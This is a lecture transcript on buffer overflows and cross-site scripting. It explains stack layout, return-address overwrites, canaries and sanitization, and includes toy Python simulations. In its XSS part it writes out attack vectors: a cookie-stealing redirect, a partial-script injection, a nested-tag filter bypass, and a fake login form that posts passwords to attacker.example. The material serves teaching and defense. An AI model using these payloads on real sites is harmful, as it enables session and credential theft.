Good morning everyone, and welcome to session 2 of day 4. Today's talk is about software vulnerabilities and web application security; I have combined the two because they are closely related. Something to think about is whether we can ever design software that is reliable and secure. Some of the attacks that exploit software vulnerabilities you have already seen a little of, or you will see in the lab. Last time we talked about SQL injection and, briefly, about cross-site scripting. Today we will complete that discussion, and we will also start talking about buffer overflow. There are other attacks in the book as well, such as format string attacks. You might want to ask yourself whether phishing attacks, for example, could be caused by software vulnerabilities. What about the various worm and virus attacks: are they directly a result of software that is not very well written? These are some of the questions to think about. We now proceed to buffer overflow, so let us see what this particular attack is. The buffer overflow vulnerability is one of the oldest and, at least until recently, one of the most common software vulnerabilities; others are now becoming important as well. Its history traces back to 1988, when a student at Cornell University by the name of Morris created a worm that broke into various systems at the university and at nearby places as well. The worm spread basically because of a buffer overflow vulnerability. He was not really interested in causing much harm; it was more of a proof of concept. But this was the beginning of the various worms that exploit the buffer overflow vulnerability.
Since then there have been many. Some of the most well known are the Code Red worm, which targeted the Microsoft IIS web server, followed about two years later, in 2003, by the Slammer worm, which actually rode on UDP rather than on TCP. So there are many different worms that are due to this buffer overflow vulnerability, and many creative ways of converting the vulnerability into an exploit. I might just add that in the security literature the word exploit is also used as a noun. In normal language we use exploit as a verb, but in the security literature you will often find it used as a noun: what are the different exploits, that is, what are the different attacks that are possible due to this buffer overflow vulnerability? So what exactly is the problem? A buffer overflow occurs when the space allocated to a variable, typically an array or a string variable in a C language program, is insufficient to accommodate the variable in its entirety. You have defined a variable, buffer for example, which is a character buffer, let us say 100 characters long. Then you try to populate it, and you keep adding and adding to it, and the buffer overflows and actually runs into some adjacent space in memory. For example, a certain amount of buffer space is allocated for an array, and only 100 characters can fit into it. But if you do not check those bounds, you keep writing into the 101st location, the 102nd location and so on. First and foremost, can you even write into the 101st or 102nd location? The answer is that in certain languages you can, and one of those languages is C. You cannot do this in Java, but you can in C, where you can overflow array bounds because there is no automatic array bounds checking.
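The difference between a checked and an unchecked write can be sketched with a toy model. This is only an illustration in Python, not real C memory: a single bytearray stands in for memory, the 100-character buffer occupies the first 100 bytes, and the four bytes right after it stand in for whatever happens to be adjacent. The names `make_memory`, `unchecked_copy` and `checked_copy` are made up for this sketch.

```python
# Toy model: one flat bytearray stands in for a region of process memory.
BUF_START, BUF_SIZE = 0, 100              # the 100-character buffer
NEIGHBOUR_START = BUF_START + BUF_SIZE    # whatever sits right after the buffer


def make_memory():
    """Return fresh 'memory': an empty buffer followed by a 4-byte neighbour."""
    memory = bytearray(BUF_SIZE + 4)
    memory[NEIGHBOUR_START:NEIGHBOUR_START + 4] = b"SAFE"
    return memory


def unchecked_copy(memory, data):
    """Mimic a C routine that never compares len(data) with BUF_SIZE."""
    for i, byte in enumerate(data):
        memory[BUF_START + i] = byte


def checked_copy(memory, data):
    """Refuse input that does not fit, as a bounds-checked language would."""
    if len(data) > BUF_SIZE:
        raise ValueError("input longer than buffer")
    unchecked_copy(memory, data)


if __name__ == "__main__":
    memory = make_memory()
    unchecked_copy(memory, b"A" * 102)    # writes the 101st and 102nd locations
    print(bytes(memory[NEIGHBOUR_START:NEIGHBOUR_START + 4]))
```

With 102 bytes of input, the unchecked copy changes the first two bytes of the neighbouring data, while the checked copy rejects the input and leaves the neighbour alone.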
So if array bounds are not checked while populating it, the array may flow into contiguous memory and corrupt it. Interestingly, this could allow an attacker to subvert the normal flow of a program. As I said on day one, think not of how things work but of how they may be made not to work. How can you subvert the normal flow of a program? You are not writing a normal program, but a program to subvert the normal operation of another program. The code is supplied by the attacker in the buffer: the attacker could directly or indirectly be responsible for supplying some malicious code, which goes into this buffer and overflows it. Now, this is a subject that is close to computer science, and it requires a certain understanding of a few things. To understand buffer overflow we need to understand the virtual memory map of the machine: what are the different segments, for example the code segment, the data segment and so on, where do they lie, and where is the stack in all of this. Then we need to understand the subroutine calling convention. In high-level language programming we call them functions; in assembly language we call them subroutines. How are subroutines called, say a main program calling a subroutine, and that subroutine calling another subroutine, and so on? What exactly happens when one subroutine calls another, and where does the responsibility lie? Several things need to be done: some are done by the calling program, some by the hardware, some by the called program, some by the compiler, and so on. So we need the subroutine calling convention and the organization of the program stack. We need to know very precisely what exactly is on the stack so that we can design our attack. The important thing here is precision.
For that we need to look at a typical pair of subroutines and see how they would appear on the stack, and what sort of variables would appear on the stack on behalf of each of them. Look at the simple subroutine A, which as you can see calls another subroutine B and then returns. It calls B with a single parameter, an integer, the number 5. As you can see over here, in subroutine B the input parameter, the argument, is an integer which we call k. Then there are certain automatic variables, the so-called local variables. The first one is buffer, a character buffer which can store 100 characters, and then an integer j, which is equal to 3 plus k. There are other subroutines that get called, but we are not so interested in them, except for maybe this one: gets(buffer). Basically, what this does is populate the buffer with whatever I type: whatever I type from the keyboard actually enters this buffer. Now, the thing is that this particular function is vulnerable in the sense that it does not care whether I have typed 10 things or 100 things or 300 things; it will simply keep writing, past the end of the buffer if need be. Therein lies the vulnerability: there is no array bounds checking, so I can overflow the buffer. Let us see what effect that has. We need to understand this pretty carefully. The first subroutine in the program will have some space on the stack allocated to it, over here for example. Then it calls another subroutine, and the stack grows in this direction.
So there will be another stack frame (we call it a stack frame) allocated to this new program that has been called. Then that program calls program A, which, as we saw on the previous slide, is now the calling program. So stack space is allocated for A, and then A calls B, and B gets allocated its stack space. Each of them gets allocated a fair amount of space, and certain things are common to all these stack frames. This one is known as the stack frame for subroutine or function B: B's stack frame. If B called something else, say a subroutine C, then C's stack frame would be on top of it, and so on. The stack grows in this direction: you keep pushing things onto it, and you keep popping them off as and when required. The interesting thing is that while the stack grows in this direction, as shown over here, memory addresses actually grow in the reverse direction. Now imagine that subroutine A is ready to call subroutine B. The first thing that should happen, and this is done by the calling subroutine itself, is that the calling parameters are put on the stack. This is done as part of A. Again, this can vary from compiler to compiler, but the argument that A uses to call B is the first thing that gets pushed onto the stack. Let us recall what that argument was: here is subroutine A calling subroutine B with this parameter, or argument. This is the first thing that gets pushed onto the stack. When this high-level language program is compiled into assembly, one of the things that happens is that code is generated to push these parameters onto the stack. The next thing that needs to get pushed onto the stack, as you can imagine, is the return address.
When B is called and then finishes, I need to continue execution in A from this point onwards. Now, how does the computer know the address at which it should continue? That address has to be saved somewhere. It is one of the most important things saved on the stack, and it is called the return address. So, as we can see in this picture, we have B's calling parameter, and then we have the return address, which is where you return after you finish executing subroutine B and continue with subroutine A. I continue at this point; this is the return address. Then there is something else that needs to be pushed onto the stack besides the return address, and that is the saved frame pointer. Recall that subroutine A was executing, and subroutine A has something called a frame pointer, which is typically stored in a register; all of A's local variables are referenced with respect to that frame pointer. Now, as soon as I start B, the frame pointer for this new subroutine will be stored in that same register, so it will in a sense overwrite the frame pointer for A. That is obviously not OK. I need to save the frame pointer for A, and that is exactly what is done over here. This is typically done by the called program. So the parameters were pushed by the calling subroutine, the return address is typically pushed by the microprocessor hardware, and the frame pointer is saved by the called function. Then we have certain local variables, as you have seen before, and those local variables are also placed on the stack.
So you push the parameter, you push the return address, you push the saved frame pointer, which A will use when control returns to it, and then you allocate space for the local variables. In this particular case there are two local variables, this and this. And of course this function may call other functions, printf for example, so there will be a build-up of stack frames on the stack because of these. Now let us look at the space allocated to buffer and to j. This is buffer: 100 bytes of space are allocated. In general it is not that straightforward, because there is a certain amount of what is called alignment, on 4-byte boundaries and so on. These are the things the hacker has to keep in mind: exactly what the organization is over here, whether some space is left out because of alignment, which variable is pushed first, this or this, where exactly the return address is with respect to the buffer, and so on. So we have the calling parameter, the return address, the saved frame pointer and the two local variables, j and buffer. Here is a summary of what I just said. When A calls B, the following are allocated or loaded on the stack: the arguments or parameters used while calling B; the return address, that is, the address at which A resumes on completion of B; a copy of A's frame pointer; and finally the local or automatic variables of B. Do not forget that A's frame pointer was in a register. All of a sudden I stop executing A and start executing B, so that register will be overwritten with B's frame pointer. I should therefore save A's frame pointer somewhere on the stack so that it can be reused when A resumes. As for the local variables, buffer is an array of 100 characters, so 100 bytes have been reserved for it on the stack.
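The layout summarized above can be written down as a small table of offsets. The sketch below is a simplified model under stated assumptions, not the output of any real compiler: it assumes a 32-bit machine with 4-byte fields, no alignment padding, and j placed between buffer and the saved frame pointer. As the lecture notes, real layouts vary with compiler and alignment. The names `FRAME_FIELDS` and `frame_offsets` are hypothetical.

```python
# Fields of B's stack frame, listed from the lowest address upward.
# Assumed layout: 4-byte fields, no padding, j sits just above buffer.
FRAME_FIELDS = [
    ("buffer", 100),              # char buffer[100]
    ("j", 4),                     # int j = 3 + k
    ("saved_frame_pointer", 4),   # copy of A's frame pointer
    ("return_address", 4),        # where A resumes after B finishes
    ("argument_k", 4),            # the argument A passed to B
]


def frame_offsets(fields):
    """Return ({field: offset from the start of buffer}, total frame size)."""
    offsets = {}
    position = 0
    for name, size in fields:
        offsets[name] = position
        position += size
    return offsets, position


if __name__ == "__main__":
    offsets, frame_size = frame_offsets(FRAME_FIELDS)
    for name, size in FRAME_FIELDS:
        print(f"{name:>20}: offset {offsets[name]:3d}, {size} bytes")
    print(f"frame size: {frame_size} bytes")
```

Under these assumptions the return address sits 108 bytes above the start of buffer. That distance is exactly the kind of detail the lecture says must be known precisely.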
Now that we understand how the stack works and what is on it, how exactly is a hacker expected to exploit all this? What happens is that you provide input to a buffer on the stack. This input could come from various sources, but directly or indirectly the malicious input can be traced back to the hacker. For example, you could have a web server that accepts HTTP requests, and the values in the HTTP request, the body for example, get stored in a buffer, and that buffer is on the stack. So the attacker provides input to this buffer on the stack, and this input could include malicious code, which is often referred to as shellcode. Basically, the attacker populates some buffer, which may populate another buffer, which in turn may populate the buffer we are talking about, because data can move from one buffer to another. The input ultimately comes from the attacker. The interesting thing is that you have, let us say, 100 bytes of space, but the actual input is much larger. So the buffer overflows, and when it overflows, the return address to the calling program is overwritten with the address of the malicious code. Let us see again what happens. The attacker has supplied input that, as I said, could arrive through an HTTP request message. It might go initially from the outside world into some buffer, and then from that buffer into this one. There is a lot of software in between to process HTTP requests and so on, but in the end the attacker's data comes in over here.
As I said before, memory addresses grow in this direction and the stack grows in this direction. This is a very important point. When I start to populate this buffer with the attacker's data, it starts from this point: it loads this, then this, and so on. He has supplied more data than the buffer can hold, but the gets function does not notice that, because it does no array bounds checking. So the buffer overflows and overwrites all of this, and the thing the attacker most wants to overwrite is the return address. What is the point of overwriting the return address? If you design the input cleverly and carefully, you can make the return address point to the malicious code, and incidentally the attacker can put the malicious code, or shellcode, in the buffer itself. So he makes the return address point to the malicious code, which is itself sitting somewhere down here. The malicious code may take a few tens of bytes, and all of it can be part of the buffer that has now been populated. The main point is this: when this subroutine finishes executing, the hardware looks at the return address, and what it finds is not the address in subroutine A that was originally put there, but the address of the malicious code. So when function B terminates, the malicious code starts to execute, and it can do all sorts of things: open a shell, obtain certain privileges, destroy certain files, read sensitive data and so on. And if it is a virus or a worm, one of the things it will do is try to spread.
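The overwrite described above can be simulated safely on a bytearray. This is a toy model and not a working exploit: the frame layout (buffer, j, saved frame pointer, return address, argument, with no padding), the little-endian 32-bit addresses, and the constants `BUFFER_ADDRESS` and `ORIGINAL_RETURN` are all assumptions made for illustration, and the filler bytes merely stand in for attacker-supplied data.

```python
import struct

# Assumed offsets inside B's frame, measured from the start of buffer.
BUF_OFF, J_OFF, FP_OFF, RET_OFF, ARG_OFF, FRAME_SIZE = 0, 100, 104, 108, 112, 116
BUFFER_ADDRESS = 0xBFFFF000    # hypothetical address of buffer in memory
ORIGINAL_RETURN = 0x08048456   # hypothetical address inside subroutine A


def new_frame():
    """Build B's frame as it looks just before gets(buffer) runs."""
    frame = bytearray(FRAME_SIZE)
    struct.pack_into("<I", frame, J_OFF, 8)              # j = 3 + k, with k = 5
    struct.pack_into("<I", frame, FP_OFF, 0xBFFFF0A0)    # A's saved frame pointer
    struct.pack_into("<I", frame, RET_OFF, ORIGINAL_RETURN)
    struct.pack_into("<I", frame, ARG_OFF, 5)            # the argument k
    return frame


def gets_like(frame, data):
    """Copy input into buffer with no bounds check, as gets would."""
    frame[BUF_OFF:BUF_OFF + len(data)] = data


def return_target(frame):
    """Address that control would jump to when B returns."""
    return struct.unpack_from("<I", frame, RET_OFF)[0]


# 108 filler bytes reach the return address; the last 4 bytes replace it
# with the address of the buffer itself, where the attacker's data now sits.
payload = b"A" * RET_OFF + struct.pack("<I", BUFFER_ADDRESS)

if __name__ == "__main__":
    frame = new_frame()
    print(hex(return_target(frame)))
    gets_like(frame, payload)
    print(hex(return_target(frame)))
```

Before the copy the return target is the address inside A; afterwards it is the address of the buffer. In this model that is all it takes to redirect control when B returns.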
The worm code will be over here, and it will, for example, look for other vulnerable machines, establish a TCP connection with one of them, and try to infect it in exactly the same way that this machine was infected. So that is one of the main ways in which you can design a worm: by exploiting the buffer overflow vulnerability. Now, the first-generation buffer overflow attacks had the malcode actually on the stack. Then a defense was thought of, and the defense was basically to make the stack non-executable. If the stack is non-executable, the malcode on it cannot execute. Then somebody came up with a second-generation buffer overflow attack, referred to as the return-into-libc exploit. Here the malicious code is not placed on the stack. Instead, the exploit makes a call to the C library function system with the parameter shown below, so nothing on the stack is executed. Think about it: there were two things we did in the first-generation attack. The most important was that we overwrote the return address, and the second was that we put the malicious code on the stack so that it would execute. The defense was to make the stack non-executable, so even if I put malicious code there it is not going to execute. I have to think of something more clever, and that something is: do not point to code on the stack, but point to this call. It is a C library call named system, taking this parameter. I put the parameter in the right place and do all of this designing.
This is not exactly straightforward: I have to work out where to put the parameter, how it gets there and so on. But the important thing is that the return address now points to this function. The malware writer knows where it sits in virtual memory, so the return address points to it, and it takes this as its parameter. The function executes, and the effect of executing this particular C library function is to spawn a shell. Now that he has a shell, the attacker can send commands to your machine, perhaps remotely, and start reading your files, writing your files, deleting your files and so on. This is the second-generation buffer overflow attack, referred to as return-into-libc because it uses one of the C library functions, namely this one. As usual, having talked about the attack and the vulnerability, the next thing is how to defend against the attack. There are several kinds of defenses, some at the operating system level, some at the compiler level and so on. One operating-system-level defense is making the stack non-executable, which prevents malicious code on the stack from being executed. You try your first-generation attack, you overwrite the return address, you put the malware on the stack, but it will not execute because the stack has been made non-executable. There are different segments in virtual memory: the code segment, the stack segment, the data segment and so on. The operating system deliberately makes the stack non-executable, so this code will not execute. This was one of the earlier defenses, and in practice you use multiple defenses in conjunction with each other. However, as we have seen, attacks like return-into-libc are still possible despite this particular defense.
Another defense, which is very widely used today, is a compiler-based option: placing a canary variable on the stack between the local variables and the return address. Why is it called a canary? We have talked about detection, prevention and so on; the canary detects that something is wrong. It is called a canary because the canary is a bird that miners used to take down into mines, since it is very sensitive to smoke and poisonous gases. If something is about to go wrong in the mine, the canary senses it very early, even though humans might not be able to, and its distress signals to the miners that something dangerous is about to happen, so they all leave the mine and are saved. In the same way, this canary signals that a buffer overflow exploit is in progress. Let us see how it acts. Once again, the canary is a compiler-based strategy. The canary is placed somewhere between the return address and the local variables. Imagine it is placed between the return address and the saved frame pointer. Now if you start to overflow the buffer, you will overwrite the canary. What exactly happens is this. The called function is B. The compiler inserts code into B which, at the start of B's execution, leaves some space over here for a canary variable, say a 4-byte value, and initializes it with some random value. The word random is very important.
So the inserted code initializes the canary with a random value at the start of the call to subroutine B, and then, just before B exits, it checks whether the canary value is still intact. The canary sits between, for example, the return address and the saved frame pointer, and the code inserted by the compiler checks whether its value has been changed. Now you can see how this works. Suppose the buffer is overflowed. The overflow overwrites everything in its path. The main goal is to overwrite the return address, but before it gets to the return address it will overwrite the canary. The attacker does not know the canary value, because it is random, so he will write something there which in all likelihood differs from the value that was stored. So when the subroutine terminates, the inserted code will see that the canary value has changed, detect an error, and abort the program, because the buffer has been overflowed. That is how the canary works. Once again: the canary is a variable inserted between the return address and the saved frame pointer, and it is initialized with a random number. The word random is important. If the value were not random, the hacker would know it and could very cleverly overflow the buffer so that the canary keeps the same value. So the compiler-generated code sets the canary at the start of the function's execution, and on termination it checks whether the canary is the same as what it was initialized to. If it is, things are safe; if it is not, the suspicion is that there has been a buffer overflow.
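The canary check can be sketched with the same kind of toy model. This is a simulation under assumptions, not what any particular compiler emits: the frame is a bytearray, the canary is 4 bytes placed between the saved frame pointer and the return address, and `call_b`, `StackSmashingDetected` and the addresses are hypothetical names and values. The optional `canary` argument exists only so the behaviour can be demonstrated deterministically.

```python
import secrets
import struct

# Assumed layout: buffer, j, saved frame pointer, canary, return address, argument.
BUF_OFF, J_OFF, FP_OFF, CANARY_OFF, RET_OFF, ARG_OFF = 0, 100, 104, 108, 112, 116
FRAME_SIZE = 120
ORIGINAL_RETURN = 0x08048456   # hypothetical address inside subroutine A


class StackSmashingDetected(Exception):
    """Raised when the canary no longer holds its initial value."""


def call_b(user_input, canary=None):
    """Simulate one call of B; return the address B would return to."""
    # Prologue (code inserted by the compiler): store a fresh random canary.
    if canary is None:
        canary = secrets.token_bytes(4)
    frame = bytearray(FRAME_SIZE)
    frame[CANARY_OFF:CANARY_OFF + 4] = canary
    struct.pack_into("<I", frame, RET_OFF, ORIGINAL_RETURN)

    # Body: unchecked copy into buffer (truncated only to keep the model in bounds).
    data = user_input[:FRAME_SIZE]
    frame[BUF_OFF:BUF_OFF + len(data)] = data

    # Epilogue (also inserted by the compiler): verify the canary before returning.
    if bytes(frame[CANARY_OFF:CANARY_OFF + 4]) != canary:
        raise StackSmashingDetected("canary changed, aborting")
    return struct.unpack_from("<I", frame, RET_OFF)[0]


if __name__ == "__main__":
    print(hex(call_b(b"hello")))
    try:
        call_b(b"A" * 116)
    except StackSmashingDetected as error:
        print("aborted:", error)
```

A short input returns normally, and a 116-byte input is caught before the corrupted return address is used. If the canary were a fixed, known value, an input that rewrote those four bytes with the same value would pass the check, which is why the lecture stresses the word random.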
That is one of the best options available today. There are others, like address space randomization. I told you about virtual memory. If you randomize the location of certain things in memory, that will again confuse the hacker, because he needs to know the exact addresses of things such as the stack and library functions. With randomized virtual memory he will not be able to determine the right address. So that is yet another defense, and in tomorrow's class we are going to demonstrate the effect of the two earlier defenses and of address space randomization. With that we more or less conclude our discussion of buffer overflow. Besides stack overflow there is another kind called heap overflow. It is in the text; we are not going to talk about it here, but those who are interested might look at it. There has been at least one more generation of attacks based on heap overflow. There are also format string attacks, which you can try out; they let you read and write arbitrary memory locations due to a vulnerability in how the printf function is used. I will not discuss these in great detail, but those who are interested can look at the book and even implement something based on them. With this I now proceed to conclude our discussion of cross-site scripting. We will have one demo today on cross-site scripting. We have also talked about SQL injection and had a demo on it before. In today's lab you will be doing SQL injection, and in tomorrow's lab you will be doing cross-site scripting, both on DVWA, the Damn Vulnerable Web Application.
Let me now talk a little more about cross-site scripting, because it might not have been very clear, and I would like to get into some further details. So, XSS: as with any attack, the things we would like to know are what the attack is, what happens in it, and what its steps are. Call that the attack scenario. Once I know what is happening, the next question is why the attack could take place in the first place, that is, what the vulnerabilities are, and then what the defenses are. Let us see if we can look at at least some of these right now. First and foremost, what is the attack? Here is me with my browser. This is my monitor, and here is the browser. I have logged into one site; this is the site I am logged into right now. Suddenly, on another tab in my browser, I get some email. I may or may not be logged into the vulnerable site, and I may be logged into many other sites, but I get an email which has a link to it. I click on this link and, lo and behold, an HTTP request is sent via the browser to that vulnerable site. This is the vulnerable website's web server, and a response is generated, and that response presumably does something malicious. We will get to what the bad thing is. But first, I was reading this email, and I saw this link, which says claim your prize, blah blah blah, click on this link to claim your prize of 1 crore rupees. What does that link actually look like? It is something like this: vulnerable dot com, then the PHP application on it, then a question mark, and then the parameters of the HTTP GET request.
Let us say par 1 is equal to something and par 2 is equal to something. This is typically what you see in an HTTP request: the parameter names and the parameter values. So this is the exact scenario. My browser is open, I was reading email, and in that email there was this malicious link. Because I clicked on the link, the browser generated a request to that particular website, which happens to be a vulnerable website, and there is an HTTP request and an HTTP response. Now, one important aspect: we should be very clear about what the attacks are and what the vulnerabilities are. The reason this site is vulnerable is that it simply reflects some of those parameters. One or both of these parameters, for example, might be reflected without any sanitization, without any validation, without any filtering. It just reflects them. And here is what the hacker does. The hacker knows that this site is vulnerable, so he designs his attack vector, as we call it, so that one or more of these parameters contains malicious code, in particular malicious JavaScript. What do we mean by malicious JavaScript? We mean script that can, for example, read your cookies and send them to the attacker's website. Those cookies might contain session information and so on, which the attacker might then use to launch a CSRF attack, cross-site request forgery. The next thing we would like to see is what exactly those attack vectors could be and what they could do. There are several attack vectors: some are complete JavaScript, some are partial JavaScript, some are pure HTML and so on. Let us look at some of them.
So parameter value is equal to this. Just imagine that the hacker sent you this particular link in the email and the web server is vulnerable, so it reflects this back. What happens is that the script gets reflected back without any sanitization and, since it is just JavaScript, it executes in your browser. If this script gets reflected back, all you will see is a pop-up window with hi in it. That does not look like a very dangerous script. We can make it a little more dangerous: instead of this parameter value we could put something like this. If this script gets reflected back, you will see the contents of the cookie displayed. Even so, it does not look terrible as yet. We can make it a little worse by shipping off the cookie to the attacker's site. So this is the first attack vector, and this is my second attack vector. I am not writing the www part each time; the same thing should be put in front of each of these. I am only writing the value after the equals sign. You can try putting this after the equals sign in the lab tomorrow, or try putting this, and see what happens. Now let us try this one. Here again is JavaScript: document dot location. I set document dot location to, guess what, a URL. The value of the parameter cookie in that URL will be document dot cookie. There is a plus here; it is not looking very clear, so I will just write it down again. This is the opening quote and this is the closing quote for the URL, and then the value for the parameter cookie is going to be document dot cookie. So this is my third attack vector. Now, what I am giving in every one of these cases is complete script.
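The vulnerability behind all three vectors, reflecting a request parameter without sanitization, can be sketched as follows. The lecture's application is PHP; this Python stand-in is only an illustration, and the host `vulnerable.example`, the page text, the parameter name `par1` and the function names are assumptions. The second function shows one common defense, HTML-escaping the value before reflecting it.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit


def get_param(url, name):
    """Extract one GET parameter from a URL ('' if it is absent)."""
    query = parse_qs(urlsplit(url).query)
    return query.get(name, [""])[0]


def respond_vulnerable(url):
    """Reflect par1 into the page exactly as received: the vulnerable pattern."""
    return "<p>Results for " + get_param(url, "par1") + "</p>"


def respond_escaped(url):
    """Reflect par1 after HTML-escaping it, so markup arrives as plain text."""
    return "<p>Results for " + html.escape(get_param(url, "par1")) + "</p>"


# A complete-script vector of the kind discussed above, placed in the link.
vector = "<script>alert(document.cookie)</script>"
link = "http://vulnerable.example/app.php?par1=" + quote(vector)

if __name__ == "__main__":
    print(respond_vulnerable(link))   # script tag reaches the browser intact
    print(respond_escaped(link))      # script tag is shown as harmless text
```

In the vulnerable response the browser receives a live script element. In the escaped response the angle brackets become `&lt;` and `&gt;`, so the same input is displayed rather than executed.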
Now, just to show you how very creative these XSS attack vectors are and how careful you have to be when you try to defend against them: it need not be the case that the attack vector is complete script. As you can see over here, what you find is complete script between the script tags. Each of these three attack vectors begins and ends with a script tag: opening script tag, closing script tag. So, one defense you might think of is to try to filter out these script tags from the input. As it turns out, it is not necessary to have a complete JavaScript statement or statements; you can have a partial script kind of injection.
Let us suppose the original web page, the static page, contains this script. Now, what the application program will do is look at the HTTP request, pull out the value of the request parameter, which I call par for parameter, and substitute it over here. So, imagine writing the web application with a bunch of PHP where you take the parameter from the request and simply substitute it over here. And suppose the parameter that was sent from the browser was something like this. Notice this is only partial script. This thing, which is the HTTP request parameter, is going to be substituted over there.
So, just read the whole thing as it is seen by the browser: script, alert, hello Mr. XYZ. Now, this is the open parenthesis, and it is closed by this one in the parameter, which finishes the JavaScript statement. Then a new statement begins, alert document.cookie, which is closed by this parenthesis that was already there in the original web page. All of this was there in the static web page, and this is the parameter that has been put over here.
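A minimal sketch of the partial script injection being described, under stated assumptions: the template string, the `PAR` placeholder and the exact quoting are guesses, since the board contents are not in the transcript, and `render` is a hypothetical stand-in for the PHP substitution.

```python
# Assumed static page: PAR marks where the request parameter is substituted.
TEMPLATE = '<script>alert("Hello Mr. PAR");</script>'


def render(par: str) -> str:
    """Substitute the request parameter into the page with no sanitization."""
    return TEMPLATE.replace("PAR", par)


# What the application intended: one alert greeting the user.
benign = render("xyz")

# The partial vector has no script tags. It closes the first statement
# and opens a second one, which the page's own text then completes.
partial_vector = 'xyz"); alert(document.cookie + "'
injected = render(partial_vector)

print(benign)
print(injected)
```

Note that a filter which only strips script tags from the input would leave `partial_vector` untouched, because the tags come from the page itself.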
So, now you can see what the browser will actually read: script, alert, hello Mr. XYZ, close the parenthesis, finish the JavaScript statement, begin the next statement, alert, open parenthesis, document.cookie, close the parenthesis, semicolon, and the JavaScript statement is completed, and then the end of the script. So, it will execute this whole thing, which is not what was originally intended by the application. The original application wanted an alert box saying hello Mr. XYZ; instead you also get another pop-up box which shows the value of the cookie. The reason this is called partial script injection, as you can very well see, is that the attack vector is not a complete JavaScript statement; it is actually a part of one statement and a part of another statement.
So, we have talked about complete injection and we have talked about partial injection. You can also do without any JavaScript at all, with HTML alone. So, you can see the complexity of the problem, the different kinds of XSS vectors that are possible. Here is another attack vector which is, believe it or not, HTML only. This is familiar to most people: we are writing a form over here. The attack vector contains only HTML, which includes a form, and the form action, that is, where the form parameters have to be sent, is the attacker's site. This is the entire attack vector. It is sent as part of the URL which you have received in the email; it is the actual parameter of the URL. This parameter was reflected back. Why? Because the website was vulnerable. It is reflected back and interpreted by your browser. The browser sees that this is all very familiar stuff, which is basically creating a form. First and foremost, it prints this message on the screen: your session has expired, please re-enter your password.
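The HTML-only vector discussed here might look something like the string below. This is a sketch, not the form from the board: the attacker URL, the field names and the button text are assumptions. The small parser only confirms that the vector contains a form and no script tag.

```python
from html.parser import HTMLParser

ATTACKER_URL = "http://attacker.example/collect"  # hypothetical

# Assumed shape of the HTML-only vector: a message followed by a form.
html_only_vector = (
    "Your session has expired. Please re-enter your password."
    '<form action="' + ATTACKER_URL + '" method="post">'
    'Password: <input type="password" name="pw">'
    '<input type="submit" value="Login">'
    "</form>"
)


class FormFinder(HTMLParser):
    """Record form actions and whether any script tag is present."""

    def __init__(self):
        super().__init__()
        self.actions = []
        self.saw_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action"))
        if tag == "script":
            self.saw_script = True


finder = FormFinder()
finder.feed("<html><body>" + html_only_vector + "</body></html>")
finder.close()

print(finder.actions, finder.saw_script)
```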
Then it actually puts a form on the screen. The action field in the form tag is the attacker's website, and what does this form do? It asks you for your password. So, you type in your credential, like a password, and this thing is actually shipped out to the attacker's site. We looked at some previous examples where the cookie was shipped out; in this example your password has been shipped out. This is a combination of a phishing attack and a cross-site scripting attack. So, again a very dangerous kind of attack, and the interesting thing is that it does not include any JavaScript; it is purely HTML.
So, I have given three examples now: one where you have an entire, complete JavaScript script, the second where you have a partial script, and the third an HTML-only attack vector. You will see all of these things in today's lab and tomorrow's lab, along with the special statements in PHP that were introduced to make your web application more secure. For example, special characters need to be identified and treated in a special way, special tags need to be handled in a separate way, and so on.
So, now that we have talked about attack scenarios, attack vectors and the vulnerability in XSS, the last thing is XSS defenses. There are three types of defenses that you can contemplate: defenses on the client side, defenses on the server side, and hybrid, meaning a combination of both. The server side has already been talked about, and one thing there is escaping or encoding: escaping in the case of SQL injection, and in the case of XSS, encoding of the special characters. The special characters in the case of XSS, that is in JavaScript and HTML, turn out to be things like these, and there are functions to encode them. You might want to see what the resulting output is when these special characters are encoded.
So, this is a special character, as you can see: the less-than sign, the start of a tag. This is a special character: the semicolon, the end of a JavaScript statement. This is a special character in JavaScript: the opening parenthesis for functions, and so on. The encoding of the less-than sign is &lt; and for the semicolon it is an ampersand, a hash sign and the number 59, that is &#59;. So, the server program will replace every occurrence of a semicolon with this thing. As a result, when it reaches the browser through the HTTP response, it will lose its special meaning. What was its special meaning in the context of JavaScript? The end of a statement. Likewise the opening parenthesis will lose its special meaning; it would be encoded as &#40;. If you do a Google search on these special characters you will see all these different encodings, but we need to encode only those that have special significance in the context of either HTML or JavaScript.
So, this is one of the server-side solutions: encoding of special characters. The other function that he talked about was to figure out where a script tag occurs and just filter it out. So, the different solutions are filtering and encoding; when we talk about sanitization, we mean these kinds of things, filtering out the kinds of scripts that can create trouble. Is this sufficient? There was one function that he showed you where the script tag was replaced by an empty string, and you can defeat that defense because you could have something like this: a script tag nested inside another script tag. He typed something like this in the text field, and the server function sanitized it using one of those statements. It removed the inner tag, replacing it with nothing, but the rest remained. So, with this thing removed you still have a script tag out there.
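Both server-side ideas above can be sketched in a few lines. This is a hedged illustration in Python rather than the PHP statements from the lab: `encode_special` and `naive_strip` are hypothetical helper names, the set of characters in `SPECIALS` is an assumption, and the nested-tag input is an assumed reconstruction of what was typed into the text field.

```python
# Characters with special meaning in HTML or JavaScript, mapped to
# their character references (for example ; becomes &#59;).
SPECIALS = {
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;",
    "'": "&#39;", ";": "&#59;", "(": "&#40;", ")": "&#41;",
}


def encode_special(text: str) -> str:
    """Encode each special character once, in a single pass."""
    return "".join(SPECIALS.get(ch, ch) for ch in text)


def naive_strip(text: str) -> str:
    """A weak filter: delete every literal '<script>' exactly once."""
    return text.replace("<script>", "")


encoded = encode_special("<script>alert(1);</script>")

# Removing the inner tag splices the outer pieces back into a script tag.
bypass = "<scr<script>ipt>alert(document.cookie)</script>"
survived = naive_strip(bypass)

print(encoded)
print(survived)
```

The single pass in `encode_special` matters: encoding `<` first and semicolons afterwards would mangle the semicolon inside `&lt;`.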
So, that sanitization is not enough. The other sanitization is, of course, escaping these characters. Now let us go to a client-side defense. The problem with the server-side defense is that it is not clear whether the web application programmer is security conscious enough to use all of these functions and sanitize everything. There are so many different ways in which these attacks can work. If you look at all those attack vectors that I wrote on the screen some time ago, you will see that there were some without the script tag, there were partial scripts, and so on. So, just removing the script tag is not going to be effective in that case. There were some that did not involve JavaScript, only HTML. So, there is a wide variety of attack vectors that are possible.
